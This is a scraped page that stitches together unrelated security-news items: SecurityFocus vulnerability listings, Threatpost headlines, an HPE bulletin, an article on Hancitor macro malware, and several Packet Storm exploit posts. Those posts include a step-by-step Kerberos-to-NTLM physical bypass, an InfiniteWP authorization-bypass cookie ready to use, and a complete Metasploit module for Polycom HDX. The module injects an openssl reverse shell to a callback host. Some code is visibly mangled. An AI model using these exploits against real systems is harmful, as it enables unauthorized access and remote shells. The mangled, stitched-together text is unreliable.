Bypass

Bugtraq ID: 93191 Class: Design Error CVE: CVE-2016-7099 Remote: Yes Local: No Published: Sep 28 2016 12:00AM Updated: Nov 19 2016 01:03AM Credit: Alexander Minozhenko and James Bunton (Atlassian). Vulnerable: Nodejs Node.Js 6.0
Nodejs Node.Js 4.0
Nodejs Node.Js 0.12
IBM SDK for Node.js 6.6.0.0
IBM SDK for Node.js 6.2.0.0
IBM SDK for Node.js 6.1.0.0
IBM SDK for Node.js 6.0.0.0
IBM SDK for Node.js 4.5.0.0
IBM SDK for Node.js 4.4.6.0
IBM SDK for Node.js 4.4.5.0
IBM SDK for Node.js 4.4.4.0
IBM SDK for Node.js 4.4.3.0
IBM SDK for Node.js 4.4.2.0
IBM SDK for Node.js 4.4.1.0
IBM SDK for Node.js 4.4.0.0
IBM SDK for Node.js 4.3.2.0
IBM SDK for Node.js 4.3.1.0
IBM SDK for Node.js 1.2.0.9
IBM SDK for Node.js 1.2.0.8
IBM SDK for Node.js 1.2.0.4
IBM SDK for Node.js 1.2.0.3
IBM SDK for Node.js 1.2.0.2
IBM SDK for Node.js 1.2.0.14
IBM SDK for Node.js 1.2.0.13
IBM SDK for Node.js 1.2.0.12
IBM SDK for Node.js 1.2.0.11
IBM SDK for Node.js 1.2.0.10
IBM SDK for Node.js 1.2.0.1
IBM SDK for Node.js 1.1.1.3
IBM SDK for Node.js 1.1.1.2
IBM SDK for Node.js 1.1.1.1
IBM SDK for Node.js 1.1.1.0
IBM SDK for Node.js 1.1.0.9
IBM SDK for Node.js 1.1.0.7
IBM SDK for Node.js 1.1.0.6
IBM SDK for Node.js 1.1.0.5
IBM SDK for Node.js 1.1.0.3
IBM SDK for Node.js 1.1.0.21
IBM SDK for Node.js 1.1.0.20
IBM SDK for Node.js 1.1.0.2
IBM SDK for Node.js 1.1.0.19
IBM SDK for Node.js 1.1.0.18
IBM SDK for Node.js 1.1.0.15
IBM SDK for Node.js 1.1.0.14
IBM SDK for Node.js 1.1.0.13
IBM SDK for Node.js 1.1.0.12
IBM SDK for Node.js 1.1
IBM Rational Application Developer for WebSphere Software 9.5
IBM Rational Application Developer for WebSphere Software 9.1 Not Vulnerable: Nodejs Node.Js 6.7
Nodejs Node.Js 4.6
Nodejs Node.Js 0.12.16
IBM SDK for Node.js 6.7.0.0
IBM SDK for Node.js 4.6.0.0
IBM SDK for Node.js 1.2.0.15
IBM SDK for Node.js 1.1.1.4


SecurityFocus Vulnerabilities

Dyn Confirms DDoS Attack Affecting Twitter, Github, Many Others

October 21, 2016 , 10:01 am

IoT Botnets Are The New Normal of DDoS Attacks

October 5, 2016 , 8:51 am

iPhone Call History Synced to iCloud Without User Consent, Knowledge

November 17, 2016 , 1:51 pm

Cryptsetup Vulnerability Grants Root Shell Access on Some Linux Systems

November 15, 2016 , 3:28 pm

Microsoft Patches Zero Day Disclosed by Google

November 8, 2016 , 2:57 pm

Microsoft Says Russian APT Group Behind Zero-Day Attacks

November 1, 2016 , 5:50 pm

Google to Make Certificate Transparency Mandatory By 2017

October 29, 2016 , 6:00 am

Microsoft Extends Malicious Macro Protection to Office 2013

October 27, 2016 , 4:27 pm

Dyn DDoS Work of Script Kiddies, Not Politically Motivated Hackers

October 25, 2016 , 3:00 pm

Mirai-Fueled IoT Botnet Behind DDoS Attacks on DNS Providers

October 22, 2016 , 6:00 am

FruityArmor APT Group Used Recently Patched Windows Zero Day

October 20, 2016 , 7:00 am

Experts ‘Outraged’ by Warrant Demanding Fingerprints to Unlock Smartphones

October 18, 2016 , 4:58 pm

Leftover Factory Debugger Doubles as Android Backdoor

October 14, 2016 , 9:00 am

Researchers Break MarsJoke Ransomware Encryption

October 3, 2016 , 5:00 am

OpenSSL Fixes Critical Bug Introduced by Latest Update

September 26, 2016 , 10:45 am

500 Million Yahoo Accounts Stolen By State-Sponsored Hackers

September 22, 2016 , 3:47 pm

Yahoo Reportedly to Confirm Breach of Hundreds of Millions of Credentials

September 22, 2016 , 12:31 pm

Experts Want Transparency From Government’s Vulnerabilities Equities Process

September 20, 2016 , 2:41 pm

Bruce Schneier on Probing Attacks Testing Core Internet Infrastructure

September 15, 2016 , 11:15 am

Generic OS X Malware Detection Method Explained

September 13, 2016 , 9:14 am

Patched Android Libutils Vulnerability Harkens Back to Stagefright

September 9, 2016 , 2:06 pm

Chrome to Label Some HTTP Sites ‘Not Secure’ in 2017

September 8, 2016 , 3:43 pm

Threatpost News Wrap, September 2, 2016

September 2, 2016 , 9:00 am

Insecure Redis Instances at Core of Attacks Against Linux Servers

September 1, 2016 , 1:08 pm

Dropbox Forces Password Reset for Older Users

August 29, 2016 , 9:58 am

Cisco Begins Patching Equation Group ASA Zero Day

August 24, 2016 , 5:53 pm

New Collision Attacks Against 3DES, Blowfish Allow for Cookie Decryption

August 24, 2016 , 8:00 am

Cisco Acknowledges ASA Zero Day Exposed by ShadowBrokers

August 17, 2016 , 4:06 pm

Pokémon GO Spam, Ransomware, On the Rise

August 17, 2016 , 12:58 pm

ProjectSauron APT On Par With Equation, Flame, Duqu

August 8, 2016 , 1:40 pm

Miller, Valasek Deliver Final Car Hacking Talk

August 4, 2016 , 3:26 pm

Researchers Go Inside a Business Email Compromise Scam

August 4, 2016 , 10:00 am

Export-Grade Crypto Patching Improves

August 3, 2016 , 10:00 am

Kaspersky Lab Launches Bug Bounty Program

August 2, 2016 , 9:00 am

Threatpost News Wrap, July 29, 2016

July 29, 2016 , 10:45 am

KeySniffer Vulnerability Opens Wireless Keyboards to Snooping

July 26, 2016 , 9:30 am

Upcoming Tor Design Battles Hidden Services Snooping

July 25, 2016 , 3:51 pm

EFF Files Lawsuit Challenging DMCA’s Restrictions on Security Researchers

July 21, 2016 , 1:18 pm

Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update

July 20, 2016 , 9:21 am

Threatpost News Wrap, July 15, 2016

July 15, 2016 , 11:00 am

Academics Build Early-Warning Ransomware Detection System

July 14, 2016 , 1:05 pm

xDedic Hacked Server Market Resurfaces on Tor Domain

July 12, 2016 , 11:40 am

Conficker Used in New Wave of Hospital IoT Device Attacks

June 30, 2016 , 11:48 am

655,000 Healthcare Records Being Sold on Dark Web

June 28, 2016 , 10:00 am

Windows Zero Day Selling for $ 90,000

May 31, 2016 , 5:44 pm

Millions of Stolen MySpace, Tumblr Credentials Being Sold Online

May 31, 2016 , 1:37 pm

OTR Protocol Patched Against Remote Code Execution Flaw

March 10, 2016 , 10:23 am

Regulation May Be Best Answer to IoT Insecurity

November 16, 2016 , 1:10 pm

Facebook Debuts Open Source Detection Tool for Windows

September 27, 2016 , 12:24 pm

Serious Dirty Cow Linux Vulnerability Under Attack

October 21, 2016 , 11:21 am

Popular Android App Leaks Microsoft Exchange User Credentials

October 14, 2016 , 8:00 am

Cisco Warns of Critical Flaws in Nexus Switches

October 7, 2016 , 10:55 am

Free Tool Protects Mac Users from Webcam Surveillance

October 7, 2016 , 7:00 am


Threatpost | The first stop for security news

# Exploit Title: Kerberos Security Feature Bypass Vulnerability (Kerberos to NTLM Fallback)
# Date: 22-09-2016
# Exploit Author: Nabeel Ahmed
# Tested on: Windows 7 Professional (x32/x64) and Windows 10 x64
# CVE : CVE-2016-3237
# Category: Local Exploits & Privilege Escalation

SPECIAL CONFIG: Standard Domain Member configuration with password caching enabled (default), BitLocker enabled without PIN or USB key.
REPRODUCE:
Prerequisites:
- Standard Windows 7/10 Fully patched (up until 08/08/2016) and member of an existing domain.
- BitLocker enabled without PIN or USB key.
- Password Caching enabled
- Victim has cached credentials stored on the system from previous logon.

This vulnerability has a similar attack path as MS15-122 and MS16-014 but bypasses the published remediation.

STEP 1: Obtain physical access to a desktop or laptop with the above configuration.
STEP 2: Boot system and determine FQDN of the device. (example. CLIENT.domain.local), this can be obtained by monitoring the network broadcast communication, which the system sends prior to loggin in. The username can be extracted from the loginscreen (E.g USER1)
STEP 3: Create Active Directory for the domain you obtained in STEP 2 (domain.local).
STEP 4: Create User with similar name as the previously logged in user. (E.g domain\USER1), and force user to change password upon next login.
STEP 5: Login on the target machine and proceed to the change login screen.
STEP 6: Disable the following (Inbound) Firewall Rules:
- Kerberos Key Distribution Center - PCR (TCP and UDP)
- Kerberos Key Distribution Center (TCP and UDP)
STEP 7: Change the password. (Changing Password screen will appear to hang)
STEP 8: Wait 1 minute before re-enabling the firewall rules defined in STEP 6
STEP 9: Enable firewall rules again and after a few seconds the password should be successfully changed.
STEP 10: Message "Your Password has been changed" is displayed, followed by the following error message "The trust relationship between this workstation and the primary domain failed."
STEP 11: Disconnect Target system's network connection.
STEP 12: Login with the new changed password.

IMPACT: Access gained to the information stored to the target system without previous knowledge of password or any other information. This could also be used to elevate your privileges to local Administrator.

Reference: Video PoC/Demo can be found here: https://www.youtube.com/watch?v=4vbmBrKRZGA
Reference: Vulnerability discovered by Nabeel Ahmed (@NabeelAhmedBE) of Dimension Data (https://www.dimensiondata.com)


Exploit Files ≈ Packet Storm

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c052577
11

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05257711
Version: 1

HPSBST03640 rev.1 - HP XP7 Command View Advance Edition Suite (CVAE) using
Replication Manager (RepMgr) and Device Manager (DevMgr), Local Access
Restriction Bypass

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2016-09-01
Last Updated: 2016-09-01

Potential Security Impact: Local Access Restriction Bypass

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP XP7 Command View
Advance Edition Suite (CVAE) using Replication Manager (RepMgr) and Device
Manager (DevMgr). This vulnerability could be locally exploited to allow
access restriction bypass.

References:

- CVE-2016-4381
- PSRT110214

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP XP7 Command View Advanced Edition Suite RepMgr and DevMgr version 6.2.0-00
to versions prior to 8.4.1-02

BACKGROUND

CVSS Base Metrics
=================
Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2016-4381
5.3 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
4.6 (AV:L/AC:L/Au:N/C:P/I:P/A:P)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c013454
99

RESOLUTION

HPE has released the following software updates to resolve the vulnerability
in HP XP7 Command View Advance Edition Suite.

- Device Manager (DevMgr) version 8.4.1-02
- Replication Manager (RepMgr) version 8.4.1-02

The updates are available from the following locations.

- Full installer updates:

https://h20575.www2.hp.com/usbportal/softwareupdate.do

- Patches:

https://h20575.www2.hpe.com/tsusbportal/index.do?lc=EN_US&src=HPSC

**Note:** A valid HPE Passport account is needed to download the patches.
Please contact HPE Technical Support for assistance.

HISTORY
Version:1 (rev.1) - 1 September 2016 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert (at) hpe (dot) com. [email concealed]

Report: To report a potential security vulnerability for any HPE supported
product:
Web form: https://www.hpe.com/info/report-security-vulnerability
Email: security-alert (at) hpe (dot) com [email concealed]

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBAgAGBQJXyJX9AAoJEGIGBBYqRO9/M/wH/26FtoAFFJZ2vb9Y3nF3rIzu
lS0Vd+kOf45OVntpJ3e5MLISEBWMxdibNTG49iXsqS0H/BsEV9j09oAHHjCpwylk
OwPB0v0xVzCuI3mUgQ8ANBj4oIkYzRv0vfwbAwpMrrAA2goLxijhxxUR9sE4Zrz3
93FwNW2H/IUq7ma5LCUDzudNgDfXR6iTH7zKJKLYDz/mPBwD/IJGtv8Si6O5oZ03
hUOqNl6irkP+415K358PU927CcQcFkLY+Wv3OsitG+w1AILRE5IV4aqIPVJCPwUl
U9vTn5jyVkHz0FHr45eK6V+ts2xaGbKYcW4fYIzfAoYUO/YBULiZ8Zwlr/TNM+g=
=Dh4J
-----END PGP SIGNATURE-----

[ reply ]


SecurityFocus Vulnerabilities

Macro-based malware is growing into full-featured malware capable of detecting and bypassing traditional security tools, Barkly researchers have discovered.

Macro-based malware: The past

Malware peddlers have been misusing Word macros to deliver malware for nearly fifteen years.

The approach, which takes advantage of the macros’ capability to automatically execute a series of instructions as a single command, has initially been used in the early 2000s.

As users became accustomed to it, this malware delivery tactic was abandoned, only to resurface again in late 2014, allowing criminals to prey on newer generations of computer users.

In the last two years, they have cycled through many different approaches for tricking users into enabling Word macros, but the malicious Word documents usually contained just scripts that would be triggered to download a dropper, which would then download the final malicious payload from a C&C server.

Macro-based malware: The future?

Barkly researchers have recently spotted a new wave of phishing emails that deliver booby-trapped Word documents posing as invoices, and asking users to enable macros in order to view the content:

Macro-based malware

But this run was unlike many others before it, because the criminals have decided to leverage a second-stage executable payload embedded directly into the Word document.

“One thing that makes this latest version of [well-known downloader] Hancitor stand out is that its payload is already bundled as a binary object directly in the Word doc. It’s this payload that pings the C2 server. What it receives are pointers back to two additional binary objects (one executable and one DLL), which it downloads and executes,” the researchers explained. The executed dynamic linked library (DLL) calls is what allows the attackers access to operating system resources and to grab additional payloads.

The change in approach is an attempt to throw traditional security tools off the malware’s scent.

In this particular spam campaign, Hancitor attempts to drop the Pony and Vawtrak information-stealing Trojans, but it could just as easily be any other type of malware.

Protecting users against macro-based malware

In enterprise setups, employees can be protected through a combination of AV and behavioral-based protection, email filtering, and event monitoring, the researchers advised. Educating users on how to spot malicious emails and phishing attempts, and making sure that they can report incidents easily and without fear of negative repercussions, is also a must.

In Office 2016, Microsoft has added a new feature that allows enterprise administrators to block all macros from running in Office documents that come from the Internet.

Non-enterprise users must still rely on their own capabilities to spot these attempts, but endpoint security solutions and spam filters used by popular email providers can be of great help.


Help Net Security

------------------------------------------------------------------------
Authorization bypass in InfiniteWP Admin Panel
------------------------------------------------------------------------
Sipke Mellema, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
An authorization bypass was found in the InfiniteWP Admin Panel that
allows an unauthenticated attacker to gain access to the InfiniteWP
Admin Panel.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0007

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on IWPAdminPanel version 2.8.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in IWPAdminPanel version 2.9.0.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/authorization_bypass_in_infinitewp_admin_panel.html

Most files in the Admin Panel (ajax.php, debug.php, et cetera) include app.php from the includes directory. This files calls the method checkUserLoggedInAndRedirect, to check if a user is logged in.

The method checkUserLoggedInAndRedirect will call checkUserLoggedIn, where a user's cookie will be unserialized. The expected value from the unserialization is a string, which will be splitted on "||". The first value will be treated as an email address and the second value as an md5 hash. The email address is used to retrieve user data from the database. The database query will return an email address and a password.

The email address and password from the result are appended to each other and are transformed to an md5 hash. This hash is compared to the hash from the cookie. If these match, the method will return true, meaning the user logged in.

By submitting a cookie with a non-existent email address the query will return an empty result. The generated md5 hash will be the md5 hash of an empty string:

md5(email + password) = md5("" + "") = md5("") = "d41d8cd98f00b204e9800998ecf8427e"

Vulnerable code:

list($ userEmail,$ userSlat) = explode('||', $ userCookie);
$ userEmail = filterParameters($ userEmail);
if($ userEmail!='' && $ userSlat!='') {
$ where = array(
'query' => "email = ':email'" ,
'params' => array(
':email'=>trim($ userEmail)
)
);
$ userInfo = DB::getRow("?:users", "userID,email,password", $ where );

$ GLOBALS['userID'] = $ userInfo['userID'];
$ GLOBALS['email'] = strtolower($ userInfo['email']);
$ dbSlat = md5($ GLOBALS['email'].$ userInfo['password']);
if($ userSlat==$ dbSlat) {
$ return = true;

Proof of concept

The following value can be base64 encoded in the user cookie to bypass the authorization check:

s:44:"falseEmail||d41d8cd98f00b204e9800998ecf8427e";

This includes a non-existing email address (falseEmail) and the md5 hash of an empty string (d41d8cd98f00b204e9800998ecf8427e).

Exploitation can be shown as follows. First, call the ajax.php page without a cookie to ensure that you are not logged in:
http://<webserver>/IWPAdminPanel_v2.8.0/ajax.php

This should return:

'"logout":true'...

Now set a cookie named iwp_userCookie to czo0NDoiZmFsc2VFbWFpbHx8ZDQxZDhjZDk4ZjAwYjIwNGU5ODAwOTk4ZWNmODQyN2UiOw== and visit the URL again. It will now return:

{"actionResult":[],"data":[]...

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.


Exploit Files ≈ Packet Storm

Export-Grade Crypto Patching Improves

August 3, 2016 , 10:00 am

Kaspersky Lab Launches Bug Bounty Program

August 2, 2016 , 9:00 am

Threatpost News Wrap, July 29, 2016

July 29, 2016 , 10:45 am

KeySniffer Vulnerability Opens Wireless Keyboards to Snooping

July 26, 2016 , 9:30 am

Upcoming Tor Design Battles Hidden Services Snooping

July 25, 2016 , 3:51 pm

EFF Files Lawsuit Challenging DMCA’s Restrictions on Security Researchers

July 21, 2016 , 1:18 pm

Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update

July 20, 2016 , 9:21 am

Threatpost News Wrap, July 15, 2016

July 15, 2016 , 11:00 am

Academics Build Early-Warning Ransomware Detection System

July 14, 2016 , 1:05 pm

xDedic Hacked Server Market Resurfaces on Tor Domain

July 12, 2016 , 11:40 am

Conficker Used in New Wave of Hospital IoT Device Attacks

June 30, 2016 , 11:48 am

655,000 Healthcare Records Being Sold on Dark Web

June 28, 2016 , 10:00 am

Windows Zero Day Selling for $ 90,000

May 31, 2016 , 5:44 pm

Millions of Stolen MySpace, Tumblr Credentials Being Sold Online

May 31, 2016 , 1:37 pm

OTR Protocol Patched Against Remote Code Execution Flaw

March 10, 2016 , 10:23 am

Inside the xDedic Hacked Server Marketplace

June 16, 2016 , 10:00 am

uTorrent Forums User List Stolen

June 9, 2016 , 2:30 pm

Patched BadTunnel Windows Bug Has ‘Extensive’ Impact

June 15, 2016 , 3:23 pm

The Illusion Of An Encrypted Internet

June 7, 2016 , 12:56 pm

Oracle EBusiness Suite ‘Massive’ Attack Surface Assessed

August 3, 2016 , 10:14 pm

Meet the 18-Year-Old Who Hacked the Pentagon

June 21, 2016 , 3:15 pm

IoT Medical Devices: A Prescription for Disaster

July 11, 2016 , 11:31 am

Android KeyStore Encryption Scheme Broken, Researchers Say

July 7, 2016 , 11:52 am


Threatpost | The first stop for security news

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report

def initialize(info = )
super(
update_info(
info,
'Name' => 'Polycom Command Shell Authorization Bypass',
'Alias' => 'psh_auth_bypass',
'Author' =>
[
'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # module
'h00die <[email protected]>', # submission/cleanup
],
'DisclosureDate' => 'Jan 18 2013',
'Description' => %q(
The login component of the Polycom Command Shell on Polycom HDX
video endpints, running software versions 3.0.5 and earlier,
is vulnerable to an authorization bypass when simultaneous
connections are made to the service, allowing remote network
attackers to gain access to a sandboxed telnet prompt without
authentication. Versions prior to 3.0.4 contain OS command
injection in the ping command which can be used to execute
arbitrary commands as root.
),
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf' ],
[ 'URL', 'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html' ],
[ 'EDB', '24494']
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Targets' => [ [ "Universal", ] ],
'Payload' =>

'Space' => 8000,
'DisableNops' => true,
'Compat' => { 'PayloadType' => 'cmd'
},
'DefaultOptions' => 'PAYLOAD' => 'cmd/unix/reverse_openssl' ,
'DefaultTarget' => 0
)
)

register_options(
[
Opt::RHOST(),
Opt::RPORT(23),
OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]),
OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ])
], self.class
)
register_advanced_options(
[
OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]),
OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100])
], self.class
)
end

def check
connect
sock.put(Rex::Text.rand_text_alpha(rand(5) + 1) + "\n")
Rex.sleep(1)
res = sock.get_once
disconnect

if !res && !res.empty?
return Exploit::CheckCode::Safe
end

if res =~ /Welcome to ViewStation/
return Exploit::CheckCode::Appears
end

Exploit::CheckCode::Safe
end

def exploit
# Keep track of results (successful connections)
results = []

# Random string for password
password = Rex::Text.rand_text_alpha(rand(5) + 1)

# Threaded login checker
max_threads = datastore['THREADS']
cur_threads = []

# Try up to 100 times just to be sure
queue = [*(1..datastore['MAX_CONNECTIONS'])]

print_status("Starting Authentication bypass with #datastore['THREADS'] threads with #datastore['MAX_CONNECTIONS'] max connections ")
until queue.empty?
while cur_threads.length < max_threads

# We can stop if we get a valid login
break unless results.empty?

# keep track of how many attempts we've made
item = queue.shift

# We can stop if we reach max tries
break unless item

t = Thread.new(item) do |count|
sock = connect
sock.put(password + "\n")
res = sock.get_once

until res.empty?
break unless results.empty?

# Post-login Polycom banner means success
if res =~ /Polycom/
results << sock
break
# bind error indicates bypass is working
elsif res =~ /bind/
sock.put(password + "\n")
# Login error means we need to disconnect
elsif res =~ /failed/
break
# To many connections means we need to disconnect
elsif res =~ /Error/
break
end
res = sock.get_once
end
end

cur_threads << t
end

# We can stop if we get a valid login
break unless results.empty?

# Add to a list of dead threads if we're finished
cur_threads.each_index do |ti|
t = cur_threads[ti]
unless t.alive?
cur_threads[ti] = nil
end
end

# Remove any dead threads from the set
cur_threads.delete(nil)

Rex.sleep(0.25)
end

# Clean up any remaining threads
cur_threads.each

if !results.empty?
print_good("#rhost:#rport Successfully exploited the authentication bypass flaw")
do_payload(results[0])
else
print_error("#rhost:#rport Unable to bypass authentication, this target may not be vulnerable")
end
end

def do_payload(sock)
# Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])

# Start a listener
start_listener(true)

# Figure out the port we picked
cbport = self.service.getsockname[2]

# Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128
cmd = "\nping ;s=$ IFS;openssl$ ss_client$ s-quiet$ s-host$ s#cbhost$ s-port$ s#cbport|sh;ping$ s-c$ s1$ s0\n"
sock.put(cmd)

# Give time for our command to be queued and executed
1.upto(5) do
Rex.sleep(1)
break if session_created?
end
end

def stage_final_payload(cli)
print_good("Sending payload of #payload.encoded.length bytes to #cli.peerhost:#cli.peerport...")
cli.put(payload.encoded + "\n")
end

def start_listener(ssl = false)
comm = datastore['ListenerComm']
if comm == 'local'
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end

self.service = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['CBPORT'],
'SSL' => ssl,
'SSLCert' => datastore['SSLCert'],
'Comm' => comm,
'Context' =>

'Msf' => framework,
'MsfExploit' => self

)

self.service.on_client_connect_proc = proc

# Start the listening service
self.service.start
end

# Shut down any running services
def cleanup
super
if self.service
print_status("Shutting down payload stager listener...")
begin
self.service.deref if self.service.is_a?(Rex::Service)
if self.service.is_a?(Rex::Socket)
self.service.close
self.service.stop
end
self.service = nil
rescue ::Exception
end
end
end

# Accessor for our TCP payload stager
attr_accessor :service
end


Exploit Files ≈ Packet Storm

Bugtraq ID: 82237 Class: Design Error CVE: CVE-2015-3197 Remote: Yes Local: No Published: Jan 28 2016 12:00AM Updated: Aug 02 2016 06:00AM Credit: Nimrod Aviram and Sebastian Schinzel Vulnerable: SuSE SUSE Linux Enterprise Server 10 SP4 LTSS
SuSE openSUSE Evergreen 11.4
Slackware Slackware Linux 14.1
Slackware Linux x86_64 -current
Slackware Linux 14.1 x86_64
Slackware Linux 14.0 x86_64
Slackware Linux 14.0
Slackware Linux -current
S.u.S.E. openSUSE 13.1
Redhat Enterprise Virtualization 3
Redhat Enterprise Linux Server AUS 6.5
Redhat Enterprise Linux Server AUS 6.4
Redhat Enterprise Linux Server AUS 6.2
Oracle VM VirtualBox 5.0.14
Oracle VM VirtualBox 5.0.13
Oracle VM VirtualBox 5.0.12
Oracle VM VirtualBox 5.0.11
Oracle VM VirtualBox 5.0.10
Oracle VM VirtualBox 5.0
Oracle VM Server for x86 3.4
Oracle VM Server for x86 3.3
Oracle VM Server for x86 3.2
Oracle Tuxedo 12.1.1.0
Oracle Switch ES1-24 1.3
Oracle Sun Network 10GE Switch 72p 1.2
Oracle Sun Blade 6000 Ethernet Switched NEM 24P 10GE 1.2
Oracle Solaris 10
Oracle Primavera P6 Enterprise Project Portfolio Management 8.4
Oracle Primavera P6 Enterprise Project Portfolio Management 8.3
Oracle Primavera P6 Enterprise Project Portfolio Management 16.1
Oracle Primavera P6 Enterprise Project Portfolio Management 15.2
Oracle Primavera P6 Enterprise Project Portfolio Management 15.1
Oracle PeopleSoft Enterprise PeopleTools 8.55
Oracle PeopleSoft Enterprise PeopleTools 8.54
Oracle PeopleSoft Enterprise PeopleTools 8.53
Oracle OSS Support Tools Oracle Explorer 10
Oracle JD Edwards EnterpriseOne Tools 9.2.0.5
Oracle Exalogic Infrastructure 2.0
Oracle Exalogic Infrastructure 1.0
Oracle Ethernet Switch 40G 10G 72 2.0
Oracle Ethernet Switch 40G 10G 64 2.0
Oracle Enterprise Manager Ops Center 12.3.2
Oracle Enterprise Manager Ops Center 12.2.2
Oracle Enterprise Manager Ops Center 12.1.4
Oracle Enterprise Linux 6.2
Oracle Enterprise Linux 6
Oracle Enterprise Linux 5
Oracle Communications Network Charging and Control 5.0.2.0.0
Oracle Communications Network Charging and Control 5.0.1.0.0
Oracle Communications Network Charging and Control 5.0.0.2.0
Oracle Communications Network Charging and Control 5.0.0.1.0
Oracle Communications Network Charging and Control 4.4.1.5.0
OpenSSL Project OpenSSL 1.0.2
OpenSSL Project OpenSSL 1.0.2e
OpenSSL Project OpenSSL 1.0.2d
OpenSSL Project OpenSSL 1.0.2c
OpenSSL Project OpenSSL 1.0.2b
OpenSSL Project OpenSSL 1.0.2a
OpenSSL Project OpenSSL 1.0.1q
OpenSSL Project OpenSSL 1.0.1p
OpenSSL Project OpenSSL 1.0.1o
OpenSSL Project OpenSSL 1.0.1n
OpenSSL Project OpenSSL 1.0.1m
OpenSSL Project OpenSSL 1.0.1l
OpenSSL Project OpenSSL 1.0.1k
OpenSSL Project OpenSSL 1.0.1j
OpenSSL Project OpenSSL 1.0.1i
OpenSSL Project OpenSSL 1.0.1h
OpenSSL Project OpenSSL 1.0.1g
OpenSSL Project OpenSSL 1.0.1f
OpenSSL Project OpenSSL 1.0.1e
OpenSSL Project OpenSSL 1.0.1d
OpenSSL Project OpenSSL 1.0.1c
OpenSSL Project OpenSSL 1.0.1b
OpenSSL Project OpenSSL 1.0.1a
OpenSSL Project OpenSSL 1.0.1
IBM Watson Explorer Foundational Components 9.0.0.6
IBM Watson Explorer Foundational Components 9.0.0.0
IBM Watson Explorer Foundational Components 10.0.0.2
IBM Watson Explorer Foundational Components 10.0.0.0
IBM Vios 2.2.3
IBM Vios 2.2
IBM Tivoli Provisioning Manager for OS Deployment 5.1 .3
IBM Tivoli Provisioning Manager for OS Deployment 5.1
IBM Tivoli Provisioning Manager for OS Deployment 7.1.1.19
IBM Tivoli Provisioning Manager for OS Deployment 7.1.1
IBM Tivoli Provisioning Manager for OS Deployment 5.1.0.2
IBM Tivoli Provisioning Manager for Images System x Edition 7.1.1.0
IBM Tivoli Provisioning Manager for Images 7.1.1.19
IBM Tivoli Provisioning Manager for Images 7.1.1.0
IBM Tivoli Netcool Reporter 2.2
IBM SmartCloud Entry 3.2 Appliance fix pack 1
IBM SmartCloud Entry 3.2
IBM SmartCloud Entry 3.1 Appliance fix pack 1
IBM SmartCloud Entry 3.1
IBM SmartCloud Entry 3.2 Appliance fixpac
IBM SmartCloud Entry 3.1 Appliance fixpac
IBM Security Network Protection 5.3.2
IBM Security Network Protection 5.3.1
IBM Security Identity Manager Virtual Appliance 7.0.1.0
IBM Security Identity Manager Virtual Appliance 7.0.0.3
